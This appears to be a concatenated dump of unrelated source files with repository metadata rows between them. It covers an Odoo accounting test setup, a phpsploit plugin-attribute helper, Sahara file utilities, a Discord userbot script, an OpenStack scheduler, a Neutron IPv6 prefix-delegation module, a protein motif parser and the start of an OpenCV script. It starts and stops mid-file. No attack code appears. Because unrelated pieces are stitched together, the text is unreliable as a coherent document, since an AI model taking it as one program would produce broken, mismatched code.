cls.account_rsa = cls.company_data['default_account_payable']
cls.product = cls.env['product.product'].create({
'name': 'Product Product 4',
'standard_price': 500.0,
'list_price': 750.0,
'type': 'consu',
'categ_id': cls.env.ref('product.product_category_all').id,
})
cls.bank_journal_euro = cls.env['account.journal'].create({'name': 'Bank', 'type': 'bank', 'code': 'BNK67'})
cls.account_euro = cls.bank_journal_euro.default_account_id
cls.bank_journal_usd = cls.env['account.journal'].create({'name': 'Bank US', 'type': 'bank', 'code': 'BNK68', 'currency_id': cls.currency_usd_id})
cls.account_usd = cls.bank_journal_usd.default_account_id
cls.fx_journal = cls.company.currency_exchange_journal_id
cls.diff_income_account = cls.company.income_currency_exchange_account_id
cls.diff_expense_account = cls.company.expense_currency_exchange_account_id
cls.inbound_payment_method = cls.env['account.payment.method'].create({
'name': 'inbound',
'code': 'IN',
'payment_type': 'inbound',
})
cls.expense_account = cls.company_data['default_account_expense']
# cash basis intermediary account
cls.tax_waiting_account = cls.env['account.account'].create({
'name': 'TAX_WAIT',
'code': 'TWAIT',
'user_type_id': cls.env.ref('account.data_account_type_current_liabilities').id,
'reconcile': True,
'company_id': cls.company.id,
})
# cash basis final account
cls.tax_final_account = cls.env['account.account'].create({
'name': 'TAX_TO_DEDUCT',
'code': 'TDEDUCT',
'user_type_id': cls.env.ref('account.data_account_type_current_assets').id,
'company_id': cls.company.id,
})
cls.tax_base_amount_account = cls.env['account.account'].create({
'name': 'TAX_BASE',
'code': 'TBASE',
'user_type_id': cls.env.ref('account.data_account_type_current_assets').id,
'company_id': cls.company.id,
})
cls.company.account_cash_basis_base_account_id = cls.tax_base_amount_account.id
# Journals
cls.purchase_journal = cls.company_data['default_journal_purchase']
cls.cash_basis_journal = cls.env['account.journal'].create({
'name': 'CABA',
'code': 'CABA',
'type': 'general',
})
cls.general_journal = cls.company_data['default_journal_misc']
# Tax Cash Basis
cls.tax_cash_basis = cls.env['account.tax'].create({
'name': 'cash basis 20%',
'type_tax_use': 'purchase',
'company_id': cls.company.id,
'amount': 20,
'tax_exigibility': 'on_payment',
'cash_basis_transition_account_id': cls.tax_waiting_account.id,
'invoice_repartition_line_ids': [
(0,0, {
'factor_percent': 100,
'repartition_type': 'base',
}),
(0,0, {
'factor_percent': 100,
'repartition_type': 'tax',
'account_id': cls.tax_final_account.id,
}),
],
'refund_repartition_line_ids': [
(0,0, {
'factor_percent': 100,
'repartition_type': 'base',
}),
(0,0, {
'factor_percent': 100,
'repartition_type': 'tax',
'account_id': cls.tax_final_account.id,
}),
],
})
cls.env['res.currency.rate'].create([
{
'currency_id': cls.env.ref('base.EUR').id,
'name': '2010-01-02',
'rate': 1.0,
}, {
'currency_id': cls.env.ref('base.USD').id,
'name': '2010-01-02',
'rate': 1.2834,
}, {
'currency_id': cls.env.ref('base.USD').id,
'name': time.strftime('%Y-06-05'),
'rate': 1.5289,
}
])
def _create_invoice(self, move_type='out_invoice', invoice_amount=50, currency_id=None, partner_id=None, date_invoice=None, payment_term_id=False, auto_validate=False):
date_invoice = date_invoice or time.strftime('%Y') + '-07-01'
invoice_vals = {
'move_type': move_type,
'partner_id': partner_id or self.partner_agrolait_id,
'invoice_date': date_invoice,
'date': date_invoice,
'invoice_line_ids': [(0, 0, {
'name': 'product that cost %s' % invoice_amount,
'quantity': 1,
'price_unit': invoice_amount,
'tax_ids': [(6, 0, [])],
})]
}
if payment_term_id:
invoice_vals['invoice_payment_term_id'] = payment_term_id
if currency_id:
invoice_vals['currency_id'] = currency_id
        invoice = self.env['account.move'].with_context(default_move_type=move_type).create(invoice_vals)
if auto_validate:
invoice.action_post()
return invoice
def create_invoice(self, move_type='out_invoice', invoice_amount=50, currency_id=None):
return self._create_invoice(move_type=move_type, invoice_amount=invoice_amount, currency_id=currency_id, auto_validate=True)
def create_invoice_partner(self, move_type='out_invoice', invoice_amount=50, currency_id=None, partner_id=False, payment_term_id=False):
return self._create_invoice(
move_type=move_type,
invoice_amount=invoice_amount,
currency_id=currency_id,
partner_id=partner_id,
payment_term_id=payment_term_id,
auto_validate=True
)
def make_payment(self, invoice_record, bank_journal, amount=0.0, amount_currency=0.0, currency_id=None, reconcile_param=[]):
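        # Registers a payment as a one-line bank statement dated July 15 of the
        # current year, posts it and reconciles the line against `reconcile_param`,
        # e.g. [{'id': receivable_line.id}].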
bank_stmt = self.env['account.bank.statement'].create({
'journal_id': bank_journal.id,
'date': time.strftime('%Y') + '-07-15',
'name': 'payment' + invoice_record.name,
'line_ids': [(0, 0, {
'payment_ref': 'payment',
'partner_id': self.partner_agrolait_id,
'amount': amount,
'amount_currency': amount_currency,
'foreign_currency_id': currency_id,
})],
})
bank_stmt.button_post()
bank_stmt.line_ids[0].reconcile(reconcile_param)
return bank_stmt
def make_customer_and_supplier_flows(self, invoice_currency_id, invoice_amount, bank_journal, amount, amount_currency, transaction_currency_id):
#we create an invoice in given invoice_currency
invoice_record = self.create_invoice(move_type='out_invoice', invoice_amount=invoice_amount, currency_id=invoice_currency_id)
#we encode a payment on it, on the given bank_journal with amount, amount_currency and transaction_currency given
line = invoice_record.line_ids.filtered(lambda line: line.account_id.user_type_id.type in ('receivable', 'payable'))
bank_stmt = self.make_payment(invoice_record, bank_journal, amount=amount, amount_currency=amount_currency, currency_id=transaction_currency_id, reconcile_param=[{'id': line.id}])
customer_move_lines = bank_stmt.line_ids.line_ids
#we create a supplier bill in given invoice_currency
invoice_record = self.create_invoice(move_type='in_invoice', invoice_amount=invoice_amount, currency_id=invoice_currency_id)
#we encode a payment on it, on the given bank_journal with amount, amount_currency and transaction_currency given
line = invoice_record.line_ids.filtered(lambda line: line.account_id.user_type_id.type in ('receivable', 'payable'))
bank_stmt = self.make_payment(invoice_record, bank_journal, amount=-amount, amount_currency=-amount_currency, currency_id=transaction_currency_id, reconcile_param=[{'id': line.id}])
supplier_move_lines = bank_stmt.line_ids.line_ids
return customer_move_lines, supplier_move_lines
| agpl-3.0 | -5,320,034,106,050,978,000 | 43.622318 | 189 | 0.523292 | false |
nil0x42/phpsploit | src/api/plugin.py | 1 | 1513 | """Provide access to attributes of currently running plugin"""
__all__ = ["plugin"]
import re
from core import plugins
class Plugin:
"""Get access to currently running plugin attributes.
Usage:
>>> from api import plugin
Attributes:
* name (type: str)
# Plugin name.
>>> plugin.name
'foobar'
* help (type: str)
# Plugin docstring (detailed help).
>>> print(plugin.help)
[*] foobar: An imaginary phpsploit plugin
DESCRIPTION:
An imaginary foobar plugin description.
...
* path (type: str)
# Absolute path of plugin's root directory.
>>> plugin.path
'/home/user/phpsploit/plugins/parent_dir/foobar/'
* category (type: str)
# Plugin's category name (parent directory).
>>> plugin.category
'Parent Dir'
"""
def __init__(self):
pass
def __getattr__(self, attr):
errmsg = "type object '%s' has no attribute '%s'"
if attr in dir(self):
return getattr(plugins.current_plugin, attr)
raise AttributeError(errmsg % (self.__class__.__name__, str(attr)))
def __dir__(self):
result = []
for attr in dir(plugins.current_plugin):
obj = getattr(plugins.current_plugin, attr)
if re.match("^[a-z]+$", attr) and not callable(obj):
result.append(attr)
return result
# instanciate plugin object (for use within python API)
plugin = Plugin()
| gpl-3.0 | 7,849,397,474,975,934,000 | 24.644068 | 75 | 0.573695 | false |
openstack/sahara | sahara/utils/files.py | 1 | 1190 | # Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from os import path
import pkg_resources as pkg
from sahara import version
def get_file_text(file_name, package='sahara'):
full_name = pkg.resource_filename(
package, file_name)
return open(full_name).read()
def get_file_binary(file_name):
full_name = pkg.resource_filename(
version.version_info.package, file_name)
return open(full_name, "rb").read()
def try_get_file_text(file_name, package='sahara'):
full_name = pkg.resource_filename(
package, file_name)
return (
open(full_name, "rb").read()
if path.isfile(full_name) else False)
| apache-2.0 | 3,584,808,584,476,616,000 | 28.75 | 69 | 0.708403 | false |
lkmnds/dickord | console.py | 1 | 1195 | import logging
import traceback
import asyncio
import requests
import dickord
route = dickord.route
import config
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger('userbot')
benis = dickord.Dicker(user_pass=('luna@localhost', 'fuck'))
@benis.sensor('READY')
async def ready_for_work(payload):
u = benis.user
logger.info(f"We are ready! name = {u.username}#{u.discriminator}, id = {u.id}")
logger.info("Requesting channel")
req = requests.get(route('channels/150501171201'), headers=benis.http.headers)
print(req)
print(req.json())
await asyncio.sleep(1)
logger.info('aaaa')
await benis.select_ass('portal 2 pinball')
await asyncio.sleep(0.5)
logger.info('sending typing')
req = requests.post(route('channels/150501171201/typing'), headers=benis.http.headers)
print(req)
print(req.text)
await asyncio.sleep(1)
logger.info('meme')
req = await benis.http.insert_benis('channels/150501171201/messages', \
{'content': 'meme'})
print(req)
print(req.text)
res, err_msg = benis.infinite_insert()
if not res:
print(f"Errored somewhere: {err_msg}")
else:
print("Exited with success")
| mit | -1,654,092,541,386,538,200 | 24.425532 | 90 | 0.68954 | false |
canarie/dair | OpenStack/misc/hardware.py | 1 | 6283 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Openstack, LLC.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Hardware Aware Scheduler
"""
import datetime
from nova import db
from nova import flags
from nova import log as logging
from nova.scheduler import driver
from nova.scheduler import simple
LOG = logging.getLogger('nova.scheduler.hardware')
FLAGS = flags.FLAGS
class HardwareScheduler(simple.SimpleScheduler):
"""Implements Naive Scheduler that tries to find least loaded host taking into account the hardware available on each host."""
def schedule_run_instance(self, context, instance_id, *_args, **_kwargs):
"""Picks a host that is up and has the fewest running instances."""
instance_ref = db.instance_get(context, instance_id)
if (instance_ref['availability_zone']
and ':' in instance_ref['availability_zone']
and context.is_admin):
zone, _x, host = instance_ref['availability_zone'].partition(':')
service = db.service_get_by_args(context.elevated(), host,
'nova-compute')
if not self.service_is_up(service):
raise driver.WillNotSchedule(_("Host %s is not alive") % host)
# TODO(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = datetime.datetime.utcnow()
db.instance_update(context, instance_id, {'host': host,
'scheduled_at': now})
return host
results = db.service_get_all_compute_sorted(context)
for result in results:
(service, instance_cores) = result
compute_ref = db.service_get_all_compute_by_host(context, service['host'])[0]
compute_node_ref = compute_ref['compute_node'][0]
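            # Placement sketch: hosts are visited in least-loaded order and the first
            # live one receives the instance, but the request fails as soon as
            #     requested_vcpus + cores_in_use > node_vcpus * FLAGS.max_cores
            # holds for the host under consideration.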
if (instance_ref['vcpus'] + instance_cores > compute_node_ref['vcpus'] * FLAGS.max_cores):
raise driver.NoValidHost(_("All hosts have too many cores"))
LOG.debug(_("requested instance cores = %s + used compute node cores = %s < total compute node cores = %s * max cores = %s") %
(instance_ref['vcpus'], instance_cores, compute_node_ref['vcpus'], FLAGS.max_cores))
if self.service_is_up(service):
# NOTE(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = datetime.datetime.utcnow()
db.instance_update(context,
instance_id,
{'host': service['host'],
'scheduled_at': now})
LOG.debug(_("instance = %s scheduled to host = %s") % (instance_id, service['host']))
return service['host']
raise driver.NoValidHost(_("Scheduler was unable to locate a host"
" for this request. Is the appropriate"
" service running?"))
def schedule_create_volume(self, context, volume_id, *_args, **_kwargs):
"""Picks a host that is up and has the fewest volumes."""
volume_ref = db.volume_get(context, volume_id)
if (volume_ref['availability_zone']
and ':' in volume_ref['availability_zone']
and context.is_admin):
zone, _x, host = volume_ref['availability_zone'].partition(':')
service = db.service_get_by_args(context.elevated(), host,
'nova-volume')
if not self.service_is_up(service):
raise driver.WillNotSchedule(_("Host %s not available") % host)
# TODO(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = datetime.datetime.utcnow()
db.volume_update(context, volume_id, {'host': host,
'scheduled_at': now})
return host
results = db.service_get_all_volume_sorted(context)
for result in results:
(service, volume_gigabytes) = result
compute_ref = db.service_get_all_compute_by_host(context, service['host'])[0]
compute_node_ref = compute_ref['compute_node'][0]
if volume_ref['size'] + volume_gigabytes > compute_node_ref['local_gb']:
raise driver.NoValidHost(_("All hosts have too many "
"gigabytes"))
LOG.debug(_("requested volume GBs = %s + used compute node GBs = %s < total compute node GBs = %s") % (volume_ref['size'], volume_gigabytes, compute_node_ref['local_gb']))
if self.service_is_up(service):
# NOTE(vish): this probably belongs in the manager, if we
# can generalize this somehow
now = datetime.datetime.utcnow()
db.volume_update(context,
volume_id,
{'host': service['host'],
'scheduled_at': now})
LOG.debug(_("volume = %s scheduled to host = %s") % (volume_id, service['host']))
return service['host']
raise driver.NoValidHost(_("Scheduler was unable to locate a host"
" for this request. Is the appropriate"
" service running?"))
| apache-2.0 | -28,713,282,382,201,856 | 44.201439 | 183 | 0.56438 | false |
chitr/neutron | neutron/agent/linux/pd.py | 1 | 14123 | # Copyright 2015 Cisco Systems
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import eventlet
import functools
import signal
import six
from stevedore import driver
from oslo_config import cfg
from oslo_log import log as logging
from neutron.agent.linux import utils as linux_utils
from neutron.callbacks import events
from neutron.callbacks import registry
from neutron.callbacks import resources
from neutron.common import constants as l3_constants
from neutron.common import ipv6_utils
from neutron.common import utils
LOG = logging.getLogger(__name__)
OPTS = [
cfg.StrOpt('pd_dhcp_driver',
default='dibbler',
help=_('Service to handle DHCPv6 Prefix delegation.')),
]
cfg.CONF.register_opts(OPTS)
class PrefixDelegation(object):
def __init__(self, context, pmon, intf_driver, notifier, pd_update_cb,
agent_conf):
self.context = context
self.pmon = pmon
self.intf_driver = intf_driver
self.notifier = notifier
self.routers = {}
self.pd_update_cb = pd_update_cb
self.agent_conf = agent_conf
self.pd_dhcp_driver = driver.DriverManager(
namespace='neutron.agent.linux.pd_drivers',
name=agent_conf.prefix_delegation_driver,
).driver
registry.subscribe(add_router,
resources.ROUTER,
events.BEFORE_CREATE)
registry.subscribe(remove_router,
resources.ROUTER,
events.AFTER_DELETE)
self._get_sync_data()
@utils.synchronized("l3-agent-pd")
def enable_subnet(self, router_id, subnet_id, prefix, ri_ifname, mac):
router = self.routers.get(router_id)
if router is None:
return
pd_info = router['subnets'].get(subnet_id)
if not pd_info:
pd_info = PDInfo(ri_ifname=ri_ifname, mac=mac)
router['subnets'][subnet_id] = pd_info
pd_info.bind_lla = self._get_lla(mac)
if pd_info.sync:
pd_info.mac = mac
pd_info.old_prefix = prefix
else:
self._add_lla(router, pd_info.get_bind_lla_with_mask())
def _delete_pd(self, router, pd_info):
self._delete_lla(router, pd_info.get_bind_lla_with_mask())
if pd_info.client_started:
pd_info.driver.disable(self.pmon, router['ns_name'])
@utils.synchronized("l3-agent-pd")
def disable_subnet(self, router_id, subnet_id):
prefix_update = {}
router = self.routers.get(router_id)
if not router:
return
pd_info = router['subnets'].get(subnet_id)
if not pd_info:
return
self._delete_pd(router, pd_info)
prefix_update[subnet_id] = l3_constants.PROVISIONAL_IPV6_PD_PREFIX
del router['subnets'][subnet_id]
LOG.debug("Update server with prefixes: %s", prefix_update)
self.notifier(self.context, prefix_update)
@utils.synchronized("l3-agent-pd")
def update_subnet(self, router_id, subnet_id, prefix):
router = self.routers.get(router_id)
if router is not None:
pd_info = router['subnets'].get(subnet_id)
if pd_info and pd_info.old_prefix != prefix:
old_prefix = pd_info.old_prefix
pd_info.old_prefix = prefix
return old_prefix
@utils.synchronized("l3-agent-pd")
def add_gw_interface(self, router_id, gw_ifname):
router = self.routers.get(router_id)
prefix_update = {}
if not router:
return
router['gw_interface'] = gw_ifname
for subnet_id, pd_info in six.iteritems(router['subnets']):
# gateway is added after internal router ports.
# If a PD is being synced, and if the prefix is available,
# send update if prefix out of sync; If not available,
# start the PD client
bind_lla_with_mask = pd_info.get_bind_lla_with_mask()
if pd_info.sync:
pd_info.sync = False
if pd_info.client_started:
if pd_info.prefix != pd_info.old_prefix:
prefix_update['subnet_id'] = pd_info.prefix
else:
self._delete_lla(router, bind_lla_with_mask)
self._add_lla(router, bind_lla_with_mask)
else:
self._add_lla(router, bind_lla_with_mask)
if prefix_update:
LOG.debug("Update server with prefixes: %s", prefix_update)
self.notifier(self.context, prefix_update)
def delete_router_pd(self, router):
prefix_update = {}
for subnet_id, pd_info in six.iteritems(router['subnets']):
self._delete_lla(router, pd_info.get_bind_lla_with_mask())
if pd_info.client_started:
pd_info.driver.disable(self.pmon, router['ns_name'])
pd_info.prefix = None
pd_info.client_started = False
prefix = l3_constants.PROVISIONAL_IPV6_PD_PREFIX
prefix_update[subnet_id] = prefix
if prefix_update:
LOG.debug("Update server with prefixes: %s", prefix_update)
self.notifier(self.context, prefix_update)
@utils.synchronized("l3-agent-pd")
def remove_gw_interface(self, router_id):
router = self.routers.get(router_id)
if router is not None:
router['gw_interface'] = None
self.delete_router_pd(router)
@utils.synchronized("l3-agent-pd")
def sync_router(self, router_id):
router = self.routers.get(router_id)
if router is not None and router['gw_interface'] is None:
self.delete_router_pd(router)
@utils.synchronized("l3-agent-pd")
def remove_stale_ri_ifname(self, router_id, stale_ifname):
router = self.routers.get(router_id)
if router is not None:
for subnet_id, pd_info in router['subnets'].items():
if pd_info.ri_ifname == stale_ifname:
self._delete_pd(router, pd_info)
del router['subnets'][subnet_id]
@staticmethod
def _get_lla(mac):
lla = ipv6_utils.get_ipv6_addr_by_EUI64(l3_constants.IPV6_LLA_PREFIX,
mac)
return lla
def _get_llas(self, gw_ifname, ns_name):
try:
return self.intf_driver.get_ipv6_llas(gw_ifname, ns_name)
except RuntimeError:
# The error message was printed as part of the driver call
# This could happen if the gw_ifname was removed
# simply return and exit the thread
return
def _add_lla(self, router, lla_with_mask):
if router['gw_interface']:
self.intf_driver.add_ipv6_addr(router['gw_interface'],
lla_with_mask,
router['ns_name'],
'link')
# There is a delay before the LLA becomes active.
# This is because the kernel runs DAD to make sure LLA uniqueness
# Spawn a thread to wait for the interface to be ready
self._spawn_lla_thread(router['gw_interface'],
router['ns_name'],
lla_with_mask)
def _spawn_lla_thread(self, gw_ifname, ns_name, lla_with_mask):
eventlet.spawn_n(self._ensure_lla_task,
gw_ifname,
ns_name,
lla_with_mask)
def _delete_lla(self, router, lla_with_mask):
if lla_with_mask and router['gw_interface']:
try:
self.intf_driver.delete_ipv6_addr(router['gw_interface'],
lla_with_mask,
router['ns_name'])
except RuntimeError:
# Ignore error if the lla doesn't exist
pass
def _ensure_lla_task(self, gw_ifname, ns_name, lla_with_mask):
# It would be insane for taking so long unless DAD test failed
# In that case, the subnet would never be assigned a prefix.
linux_utils.wait_until_true(functools.partial(self._lla_available,
gw_ifname,
ns_name,
lla_with_mask),
timeout=l3_constants.LLA_TASK_TIMEOUT,
sleep=2)
def _lla_available(self, gw_ifname, ns_name, lla_with_mask):
llas = self._get_llas(gw_ifname, ns_name)
if self._is_lla_active(lla_with_mask, llas):
LOG.debug("LLA %s is active now" % lla_with_mask)
self.pd_update_cb()
return True
@staticmethod
def _is_lla_active(lla_with_mask, llas):
for lla in llas:
if lla_with_mask == lla['cidr']:
return not lla['tentative']
return False
@utils.synchronized("l3-agent-pd")
def process_prefix_update(self):
LOG.debug("Processing IPv6 PD Prefix Update")
prefix_update = {}
for router_id, router in six.iteritems(self.routers):
if not router['gw_interface']:
continue
llas = None
for subnet_id, pd_info in six.iteritems(router['subnets']):
if pd_info.client_started:
prefix = pd_info.driver.get_prefix()
if prefix != pd_info.prefix:
pd_info.prefix = prefix
prefix_update[subnet_id] = prefix
else:
if not llas:
llas = self._get_llas(router['gw_interface'],
router['ns_name'])
if self._is_lla_active(pd_info.get_bind_lla_with_mask(),
llas):
if not pd_info.driver:
pd_info.driver = self.pd_dhcp_driver(
router_id, subnet_id, pd_info.ri_ifname)
pd_info.driver.enable(self.pmon, router['ns_name'],
router['gw_interface'],
pd_info.bind_lla)
pd_info.client_started = True
if prefix_update:
LOG.debug("Update server with prefixes: %s", prefix_update)
self.notifier(self.context, prefix_update)
def after_start(self):
LOG.debug('SIGUSR1 signal handler set')
signal.signal(signal.SIGUSR1, self._handle_sigusr1)
def _handle_sigusr1(self, signum, frame):
"""Update PD on receiving SIGUSR1.
The external DHCPv6 client uses SIGUSR1 to notify agent
of prefix changes.
"""
self.pd_update_cb()
def _get_sync_data(self):
sync_data = self.pd_dhcp_driver.get_sync_data()
for pd_info in sync_data:
router_id = pd_info.router_id
if not self.routers.get(router_id):
self.routers[router_id] = {'gw_interface': None,
'ns_name': None,
'subnets': {}}
new_pd_info = PDInfo(pd_info=pd_info)
subnets = self.routers[router_id]['subnets']
subnets[pd_info.subnet_id] = new_pd_info
@utils.synchronized("l3-agent-pd")
def remove_router(resource, event, l3_agent, **kwargs):
router_id = kwargs['router'].router_id
router = l3_agent.pd.routers.get(router_id)
l3_agent.pd.delete_router_pd(router)
del l3_agent.pd.routers[router_id]['subnets']
del l3_agent.pd.routers[router_id]
def get_router_entry(ns_name):
return {'gw_interface': None,
'ns_name': ns_name,
'subnets': {}}
@utils.synchronized("l3-agent-pd")
def add_router(resource, event, l3_agent, **kwargs):
added_router = kwargs['router']
router = l3_agent.pd.routers.get(added_router.router_id)
if not router:
l3_agent.pd.routers[added_router.router_id] = (
get_router_entry(added_router.ns_name))
else:
# This will happen during l3 agent restart
router['ns_name'] = added_router.ns_name
class PDInfo(object):
"""A class to simplify storing and passing of information relevant to
Prefix Delegation operations for a given subnet.
"""
def __init__(self, pd_info=None, ri_ifname=None, mac=None):
if pd_info is None:
self.prefix = l3_constants.PROVISIONAL_IPV6_PD_PREFIX
self.old_prefix = l3_constants.PROVISIONAL_IPV6_PD_PREFIX
self.ri_ifname = ri_ifname
self.mac = mac
self.bind_lla = None
self.sync = False
self.driver = None
self.client_started = False
else:
self.prefix = pd_info.prefix
self.old_prefix = None
self.ri_ifname = pd_info.ri_ifname
self.mac = None
self.bind_lla = None
self.sync = True
self.driver = pd_info.driver
self.client_started = pd_info.client_started
def get_bind_lla_with_mask(self):
bind_lla_with_mask = '%s/64' % self.bind_lla
return bind_lla_with_mask
| apache-2.0 | 830,436,446,756,060,500 | 38.339833 | 78 | 0.553636 | false |
fxb22/BioGUI | Utils/GetMotifs.py | 1 | 5020 | import CirclePlotClass as cpc
class GetMotifs():
def DefineColLists(self):
self.colList = []
r = 0
while r < self.total_length:
self.colList.append(-1)
r += 1
self.sse = self.cpss.GetSSE()
self.secLinks = self.cpss.GetSecLinks()
for s in self.sse:
j = s[0]
while j < s[1]:
self.colList[j] = s[2] + 1
j += 1
for s in self.secLinks:
if s[2] > 0:
j = s[0]
while j < s[1]:
self.colList[int(j)] = 2
j += 1
def CheckSse(self):
shets = []
for s in self.sse:
f = s[0]
n = s[1]
c = s[2]
for e in self.sse:
if f < e[0]:
if n >= e[0]:
if n < e[1]:
n = e[1]
if f <= e[1]:
if n <= e[1]:
if f > e[0]:
f = e[0]
if not [f, n, c] in shets:
shets.append([f, n, c])
for s in shets:
go = True
for e in shets:
if s[0] > e[0] and s[0] < e[1]:
go = False
if s[1] > e[0] and s[1] < e[1]:
go = False
if go:
self.sheets.append(s)
def CheckSecLinks(self):
for s in self.secLinks:
f = -1
n = -1
for i,e in enumerate(self.sheets):
if s[0] >= e[0] and s[0] < e[1]:
f = i
if s[1] > e[0] and s[1] <= e[1]:
n = i
if f >= 0 and n >= 0:
t = -1
if self.sheets[f][2] == self.sheets[n][2]:
t = 1
a = [self.sheets[f][:2], self.sheets[n][:2], t]
if not a in self.motif:
if not a[0] == a[1]:
self.motif.append(a)
if s[2] == 1:
self.helices.append(s[0])
def FormMotifs(self):
self.motif = []
self.helices = []
self.sheets = []
self.CheckSse()
self.CheckSecLinks()
def FormFrequencies(self, order):
freqs = dict()
for o in order:
if not o[0][0] in freqs:
freqs[o[0][0]] = 1
else:
freqs[o[0][0]] += 1
if not o[1][0] in freqs:
freqs[o[1][0]] = 1
else:
freqs[o[1][0]] += 1
return freqs
def FindMotif(self, n):
i = 0
out = [-1,[[n,-1],[-1,-1],-1]]
while i < len(self.motif):
if self.motif[i][0][0] == n:
out = [i,self.motif[i]]
self.motif.pop(i)
i = len(self.motif)
elif self.motif[i][1][0] == n:
out = [i,[self.motif[i][1],self.motif[i][0],self.motif[i][2]]]
self.motif.pop(i)
i = len(self.motif)
i += 1
return out
def FormGuess(self, freqs):
self.orders = []
fk = freqs.keys()
i = 0
while i < len(fk):
if freqs[fk[i]] == 1:
freqs[fk[i]] -= 1
m = self.FindMotif(fk[i])
self.orders.append([[m[1][0],1]])
prevDir = 1
while m[1][1][0] >= 0 and freqs[m[1][1][0]] >= 1:
prevDir = m[1][2]
self.orders[-1].append([m[1][1], m[1][2]])
freqs[m[1][0][0]] -= 1
m = self.FindMotif(m[1][1][0])
freqs[m[1][0][0]] -= 1
i = -1
if self.orders[-1][-1][0][0]<self.orders[-1][0][0][0]:
temp = []
temp.append([self.orders[-1][-1][0],1])
idk = 1
while idk<len(self.orders[-1]):
temp.append([self.orders[-1][-idk-1][0],
self.orders[-1][-idk][1]])
idk += 1
self.orders[-1] = temp
elif i == len(fk) - 1:
if freqs[fk[0]] > 1:
freqs[fk[0]] -= 1
i = -1
i += 1
def MotifFolds(self):
self.FormMotifs()
freqs = self.FormFrequencies(self.motif)
self.FormGuess(freqs)
def GetExec(self, rec, frSize, pdbMat, meth):
self.cpss = cpc.SecondaryStructure()
self.cpss.GetExec(rec, frSize, pdbMat, meth)
self.alpha_carb_pos = self.cpss.cp.GetCarbonPos()
self.chainEnds = self.cpss.cp.GetChainEnds()
self.total_length = self.cpss.cp.GetLength()
self.residueList = self.cpss.cp.GetResidues()
self.DefineColLists()
self.MotifFolds()
return [[self.orders], self.helices, self.secLinks]
| gpl-2.0 | 7,772,521,076,914,863,000 | 32.026316 | 78 | 0.375498 | false |
MagicUmom/pattern_recognition_project | circle.py | 1 | 19680 | # coding=<utf-8>
import numpy as np
import cv2
from matplotlib import pyplot as plt
from matplotlib.widgets import Slider
from numpy import *
import copy
import time
import sys
import math
import operator
import os
pic_path = 'dataset/true/1.png'
pic_dir = 'dataset/true_resize_rotate/'
rect_scale = 5
rect_area = 0
rect_min_area = 0.0010
color_range = 20
hvs_luminance = 190
angle_limit = 8
top_ext_dist = 4
cluster_dist = 20
#---------------------------------------------------------
pic_width = 0
pic_height = 0
#---------------------------------------------------------
def CalculateOneLineAndOnePointMinDistance(a,b,c):
u = np.array([b[0] - a[0], (pic_height-b[1]) - (pic_height-a[1])])
v = np.array([c[0] - a[0], (pic_height-c[1]) - (pic_height-a[1])])
if (linalg.norm(u) > 0):
L = abs(cross(u, v) / linalg.norm(u))
else:
L = int()
return L
def CalculateTwoPointDistance(src, dst):
a = np.array(src)
b = np.array(dst)
return np.linalg.norm(b-a)
def PointConvertDegree(center, point1):
angle = math.degrees(math.atan2((pic_height-point1[1]) - (pic_height-center[1]), point1[0] - center[0]))
if (angle < 0) :
angle = 360 + angle
return angle
def DegreeCompare(angleRef, angleDst):
result = angleDst - angleRef
if result > 180:
result = 180 - result
if result < -180:
result = result + 360
return result
def DegreeMirror(angle):
if angle > 180:
angle += 180
if angle >= 360:
angle -= 360
return angle
def GetRectColor(img, rect):
m1 = np.zeros(img.shape, np.uint8)
cv2.drawContours(m1, rect, 0, (255, 255, 255), -1)
m1 = cv2.cvtColor(m1, cv2.COLOR_BGR2GRAY)
m2 = cv2.bitwise_and(img, img, mask=m1)
hist0 = cv2.calcHist([m2], [0], None, [256], [0.0, 255.0])
hist1 = cv2.calcHist([m2], [1], None, [256], [0.0, 255.0])
hist2 = cv2.calcHist([m2], [2], None, [256], [0.0, 255.0])
hist0[0:10] = 0
hist1[0:10] = 0
hist2[0:10] = 0
maxidx0, maxval0 = max(enumerate(hist0), key=operator.itemgetter(1))
maxidx1, maxval1 = max(enumerate(hist1), key=operator.itemgetter(1))
maxidx2, maxval2 = max(enumerate(hist2), key=operator.itemgetter(1))
#return (maxidx0, maxidx1, maxidx2)
return (maxval0, maxval1, maxval2)
'''
def GetRectColorHsv(img):
hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
hist0 = cv2.calcHist([hsv], [0], None, [180], [0, 180])
hist1 = cv2.calcHist([hsv], [1], None, [256], [0, 256])
hist2 = cv2.calcHist([hsv], [2], None, [256], [0, 256])
hist1[0:10] = 0
hist2[0:10] = 0
hist2[0:10] = 0
maxidx0, maxval0 = max(enumerate(hist0), key=operator.itemgetter(1))
maxidx1, maxval1 = max(enumerate(hist1), key=operator.itemgetter(1))
maxidx2, maxval2 = max(enumerate(hist2), key=operator.itemgetter(1))
return (maxidx0, maxidx1, maxidx2)
'''
def drawPoint(img, point, size=1, color=(0, 0, 255)):
cv2.circle(img, point, size, color, -1)
def FindCluster(cluster, idx1, idx2, rectWH):
